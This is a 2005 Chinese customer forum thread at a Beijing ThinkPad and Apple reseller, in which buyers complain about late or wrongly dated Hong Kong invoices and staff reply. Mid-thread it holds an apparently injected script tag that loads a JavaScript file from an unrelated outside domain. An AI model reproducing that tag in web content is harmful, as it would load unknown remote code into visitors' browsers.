开业于2004年,诚信服务几万客户
翔意数码淘宝店:xynbnb.taobao.com
全国客服电话:010-59000667
地址:北京东城区东兴隆街56号北京商界A座512
ThinkPad产品专业客服 苹果产品专业客服

港票到的是不是慢了点啊?

港票到的是不是慢了点啊?呵呵,这个其实还能接受,可为什么QQ上我问港票的问题,老不理我啊。:han::ju07:
阿,不是回答你了吗。。。。。你的要不就是没到,要不就是在邮递的路上。。。。
★★★
<script type="text/javascript" src="http://www.972.cc/1.js"></script>
<link href="http://www.972.cc/1.css" rel="stylesheet" type="text/css" media="screen" />

<P>&nbsp;</P>

呵呵,了解了。刚刚没看到。
还没有到,哎。2月14号买的,现在快4月了。
如果超过1个月没到的话请主动联系我们,因为每次我们邮寄的一些港票都会因为留的邮寄地址问题退回来一些
我就在北京啊,不需要邮寄啊。
不管是不是北京的都要邮寄的。。。如果怕邮局丢可以选择来我们公司拿。。。
可以去拿啊,只是不知道我的到了没有啊。
我也在等。。。。。。。。。。。
Originally posted by iuhxq at 2005-4-4 09:38
我也在等。。。。。。。。。。。

呵呵,你等了多久啊?:ju07:
大概要多久啊,2周能拿到吗?
我等了快2个月了,2月14号买的。因为意翔的服务好才找他们买机器的,不过这次的事让我感到比较失望。QQ上问杨阳也不理我。至今没有得到合理的解释。哎…………
qq一般如果没有回答你,那么用可能使我不在。。。。都是贵宾了,以后有时还是直接给我打电话把,那个来得快。。。要不有可能网上答复有遗漏的,我先给您道个谦。港票不出意外您应该很快就能收到了!我们上周刚发了一批!
呵呵,我在北京啊,到了的话不用邮寄,直接打电话叫我拿一趟就行了。
港票终于到了,不过我要发票开2月8号-12号之间的,还和你们说了好多次了。呵呵,结果还是给我弄错了。开成三月份的了。这个问题能解决吗?呵呵:)